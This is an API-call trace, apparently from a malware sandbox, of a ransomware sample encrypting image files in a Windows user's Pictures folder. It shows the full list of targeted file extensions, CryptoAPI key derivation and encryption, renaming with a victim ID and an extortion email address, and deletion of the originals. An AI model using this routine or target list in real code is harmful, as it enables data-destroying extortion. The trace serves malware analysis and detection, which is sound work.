	[0197.331] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif")) returned 1
	[0197.345] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif")) returned 0
	[0197.345] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1576f8d0, ftCreationTime.dwHighDateTime=0x1d9731b, ftLastAccessTime.dwLowDateTime=0xd1c140f0, ftLastAccessTime.dwHighDateTime=0x1d975f9, ftLastWriteTime.dwLowDateTime=0xd1c140f0, ftLastWriteTime.dwHighDateTime=0x1d975f9, nFileSizeHigh=0x0, nFileSizeLow=0x404e, dwReserved0=0x0, dwReserved1=0x0, cFileName="iFM43T.jpg", cAlternateFileName="")) returned 1
	[0197.345] lstrcmpW (lpString1="iFM43T.jpg", lpString2="..") returned 1
	[0197.345] lstrcmpW (lpString1="iFM43T.jpg", lpString2=".") returned 1
	[0197.345] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.346] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="iFM43T.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\iFM43T.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\iFM43T.jpg"
	[0197.346] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\iFM43T.jpg") returned 54
	[0197.346] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.346] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\iFM43T.jpg", cchLength=0x36 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg") returned 0x36
	[0197.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.346] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.347] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg"
	[0197.347] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg") returned 54
	[0197.347] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.347] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0197.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.348] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.348] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.349] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.349] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.352] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x404e, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x404e, lpOverlapped=0x0) returned 1
	[0197.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.367] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb198) returned 1
	[0197.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.371] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.371] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.372] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8f30) returned 1
	[0197.372] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.372] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x404e, dwBufLen=0x404e | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x4050) returned 1
	[0197.373] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.373] RtlMoveMemory (in: Destination=0xfe11d8, Source=0xfdd180, Length=0x404e | out: Destination=0xfe11d8) 
	[0197.373] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.373] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe11d8*, pdwDataLen=0x18aefc*=0x404e, dwBufLen=0x4050 | out: pbData=0xfe11d8*, pdwDataLen=0x18aefc*=0x4050) returned 1
	[0197.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.374] CryptDestroyKey (hKey=0xfb8f30) returned 1
	[0197.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.374] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.375] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0197.375] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.375] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.376] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.377] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 96
	[0197.377] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.378] WriteFile (in: hFile=0x388, lpBuffer=0xfe11d8*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe11d8*, lpNumberOfBytesWritten=0x18b358*=0x4050, lpOverlapped=0x0) returned 1
	[0197.382] CloseHandle (hObject=0x388) returned 1
	[0197.382] CloseHandle (hObject=0x2c0) returned 1
	[0197.383] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg")) returned 1
	[0197.387] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\ifm43t.jpg")) returned 0
	[0197.387] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfcbc80, ftCreationTime.dwHighDateTime=0x1d96dd4, ftLastAccessTime.dwLowDateTime=0x618a1230, ftLastAccessTime.dwHighDateTime=0x1d970f4, ftLastWriteTime.dwLowDateTime=0x618a1230, ftLastWriteTime.dwHighDateTime=0x1d970f4, nFileSizeHigh=0x0, nFileSizeLow=0x18ed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="k6X1LBrqiVx -.jpg", cAlternateFileName="K6X1LB~1.JPG")) returned 1
	[0197.388] lstrcmpW (lpString1="k6X1LBrqiVx -.jpg", lpString2="..") returned 1
	[0197.388] lstrcmpW (lpString1="k6X1LBrqiVx -.jpg", lpString2=".") returned 1
	[0197.388] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.388] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="k6X1LBrqiVx -.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\k6X1LBrqiVx -.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\k6X1LBrqiVx -.jpg"
	[0197.388] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\k6X1LBrqiVx -.jpg") returned 61
	[0197.388] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.390] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\k6X1LBrqiVx -.jpg", cchLength=0x3d | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg") returned 0x3d
	[0197.390] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.391] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.391] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg"
	[0197.391] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg") returned 61
	[0197.391] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.392] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0197.392] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.392] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.